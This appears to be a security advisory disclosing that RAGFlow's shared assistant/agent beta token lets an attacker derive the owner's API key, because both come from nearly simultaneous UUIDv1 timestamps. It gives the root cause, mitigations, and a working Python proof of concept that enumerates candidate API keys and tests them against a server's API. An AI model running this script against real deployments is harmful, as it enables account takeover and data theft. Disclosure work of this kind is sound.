Predictable Token Generation Leading to Authentication Bypass Vulnerability

Summary

The use of an insecure key generation algorithm in the API key and beta (assistant/agent share auth) token generation process allows these tokens to be mutually derivable. Specifically, both tokens are generated using the same URLSafeTimedSerializer with predictable inputs, enabling an unauthorized user who obtains the shared assistant/agent URL to derive the personal API key. This grants them full control over the assistant/agent owner's account.

Details

The issue originates in the token generation process at /api/apps/system_app.py#L214-215, where both the API key (token) and the beta token are generated nearly simultaneously using the generate_confirmation_token function (/api/utils/api_utils.py#L378). This function constructs a URLSafeTimedSerializer instance, initialized with the tenant_id as the secret_key, and uses get_uuid() as the input data, with tenant_id as the salt. The resulting token is prefixed with "ragflow-" and truncated to [2:34].

The URLSafeTimedSerializer (from itsdangerous, see documentation) serializes the input data (a UUIDv1 from get_uuid()) into a JSON object, generates a signature, and encodes the result in base64. For example, calling s.dumps("b4f3ce1a992911f0bf61325096b39f47") produces:

ImI0ZjNjZTFhOTkyOTExZjBiZjYxMzI1MDk2YjM5ZjQ3Ig.aNO7XA.-gBAm-REn4flryA-UD0uxFO-VXo

Decoding the base64 portion before the first . yields the original UUIDv1 ("b4f3ce1a992911f0bf61325096b39f47") as a JSON object. The truncation [2:34] extracts a portion of this plaintext UUIDv1.

Per the UUIDv1 specification (RFC 9562), the first 60 bits represent a timestamp in 100ns intervals. The extracted [2:34] substring corresponds to bits [2,98] of the UUIDv1, which includes the time_low, time_mid, and time_high fields. Since the API key and beta token are generated almost simultaneously, their timestamps are nearly identical, and the system’s time variance is minimal. This predictability allows an attacker to enumerate possible tokens with minimal attempts, derive the API key from the beta token, and perform unauthorized operations.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Note: To demonstrate the vulnerability, the following steps are suggested:

Clone the repository and set up the environment (e.g., install dependencies, configure the server).
Generate a beta token and API key using the application.
Extract the UUIDv1 from the beta token by decoding the base64 portion and reversing the [2:34] truncation.
Enumerate possible API keys using the predictable timestamp range from the UUIDv1.
Use the derived API key to perform privileged actions, verifying unauthorized access.

Here is python code to decode beta, construct new tokens, attempt API call:

import base64
import requests

def from_token_to_ts_low(t):
    if(t.startswith("ragflow-")):
        t = t[8:]
    tpad = "Ij" + t[:10]
    # print(tpad)
    tt = base64.b64decode(tpad).decode("utf-8")
    # print(tt)
    assert tt[0] == '"'
    ts = int(tt[1:],16)
    # print(ts)
    return ts

def from_ts_low_to_token(ts, token):
    if(token.startswith("ragflow-")):
        token = token[8:]
    # encode ts_low back to token
    # override the first 10 chars of token
    th = hex(ts)[2:]  # remove '0x'
    th = th.rjust(8, '0')
    tpad = '"' + th + '"'
    tenc = base64.b64encode(tpad.encode("utf-8")).decode("utf-8")
    return tenc[2:12] + token[10:]

def api_call_with_token_attempt(token, base_url):
    # simulate an API call that uses the token
    response = requests.get(base_url + "api/v1/datasets", headers={"Authorization": f"Bearer {token}"})
    try:
        data = response.json()
        if data['code'] == 0:
            print("API call successful")
            return True
        else:
            print(f"API call failed with status code {response.status_code}")
            return False
    except Exception as e:
        print(f"API call failed with exception: {e}")
        return False

beta = "I0ZjNjZTFhOTkyOTExZjBiZjYxMzI1MD"
beta_low = from_token_to_ts_low(beta)


base_url = "https://example.com/"

# while loop, each time test +10, -10, +20, -20, +30, -30, ...
# In local test, the time gap between token and beta always is multiple of 10
# So we only need to test deltas that are multiple of 10
# Middle point is 2500, which is the average gap we observed
middle = 2500
attempt_count = 100
count = 0
for delta in range(middle, middle + attempt_count * 10 // 2  , 10):
    for sign in [1, -1]:
        new_ts_low = beta_low - sign * delta
        new_token = from_ts_low_to_token(new_ts_low, beta)
        decoded_ts_low = from_token_to_ts_low(new_token)
        assert decoded_ts_low == new_ts_low, f"failed for delta {sign * delta}: got {decoded_ts_low}, expected {new_ts_low}"
        print(f"delta {sign * delta}: new_token {new_token}, decoded_ts_low {decoded_ts_low}")
        # use new_token to attempt to API call
        new_token_with_prefix = "ragflow-" + new_token
        success = api_call_with_token_attempt(new_token_with_prefix, base_url)
        if success:
            print(f"Success with delta {sign * delta}")
            print(f"Found valid token: {new_token}")
            # exit the code
            exit(0)

Impact

This is a critical authentication bypass vulnerability. An attacker who obtains the shared assistant/agent URL (containing the beta token) can derive the API key, granting full control over the account, including access to sensitive data and privileged operations. All users who share assistant/agent URLs are impacted.

Mitigation Suggestions

Replace UUIDv1 with UUIDv4 for token generation to ensure randomness (/api/utils/__init__.py#L343). UUIDv4 eliminates the predictable timestamp component.
Remove the unnecessary URLSafeTimedSerializer wrapping, as it introduces predictable base64-encoded output.
Implement a cryptographically secure random token generator (e.g., Python’s secrets module) for both API keys and beta tokens.
Ensure tokens are sufficiently long and unique to prevent enumeration attacks.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Predictable Token Generation Leading to Authentication Bypass Vulnerability

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Mitigation Suggestions

Severity

CVSS overall score

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVSS v4 base metrics

Exploitability Metrics

Vulnerable System Impact Metrics

Subsequent System Impact Metrics

CVE ID

Weaknesses

Generation of Predictable Numbers or Identifiers

Credits